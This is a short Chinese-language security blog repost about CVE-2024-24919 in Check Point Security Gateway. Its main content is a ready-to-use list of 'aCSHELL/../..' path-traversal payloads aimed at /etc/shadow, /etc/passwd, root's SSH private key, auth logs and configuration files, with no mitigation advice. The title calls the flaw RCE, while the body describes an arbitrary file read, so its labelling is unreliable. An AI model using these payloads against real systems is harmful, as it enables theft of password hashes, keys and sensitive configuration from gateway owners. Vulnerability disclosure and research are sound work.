CVE-2024-24919 Check Point 安全网关 RCE

2024年6月4日15:19:45评论34 views字数 835阅读2分47秒阅读模式

CVE-2024-24919是一个高严重性信息泄露漏洞，允许攻击者远程读取 Check Point 安全网关上的任意文件。此漏洞可被用来窃取敏感信息，例如密码和配置文件。

'aCSHELL/../../../../../../../../../../../etc/passwd','aCSHELL/../../../../../../../../../../../etc/apache2/apache2.conf','aCSHELL/../../../../../../../../../../../etc/mysql/my.cnf','aCSHELL/../../../../../../../../../../../var/log/syslog','aCSHELL/../../../../../../../../../../../var/log/auth.log','aCSHELL/../../../../../../../../../../../var/log/messages','aCSHELL/../../../../../../../../../../../etc/group','aCSHELL/../../../../../../../../../../../etc/shadow','aCSHELL/../../../../../../../../../../../root/.ssh/id_rsa','aCSHELL/../../../../../../../../../../../etc/hostname','aCSHELL/../../../../../../../../../../../etc/hosts','aCSHELL/../../../../../../../../../../../etc/resolv.conf'

原文始发于微信公众号（TtTeam）：CVE-2024-24919 Check Point 安全网关 RCE

左青龙
微信扫一扫

右白虎
微信扫一扫

CVE-2024-24919 Check Point 安全网关 RCE

华测监测预警系统2.2 UserEdit.aspx sql注入

【成功复现】XWiki Platform远程代码执行漏洞(CVE-2024-29973)

某HCM智能人力资源系统存在SQL注入漏洞导致Getshell

某华ICC智能物联综合管理平台env敏感信息泄露

GeoServer开源地理服务 wfs 远程命令执行(CVE-2024-36401)

用友NC-oacoSchedulerEvents-SQL注入漏洞复现

CVE-2024-29973 漏洞复现

用友 GRP-U8 FileUpload 任意文件上传漏洞

瑞友天翼应用虚拟化系统SQL注入漏洞

go-getter命令注入漏洞

发表评论

在线咨询

微信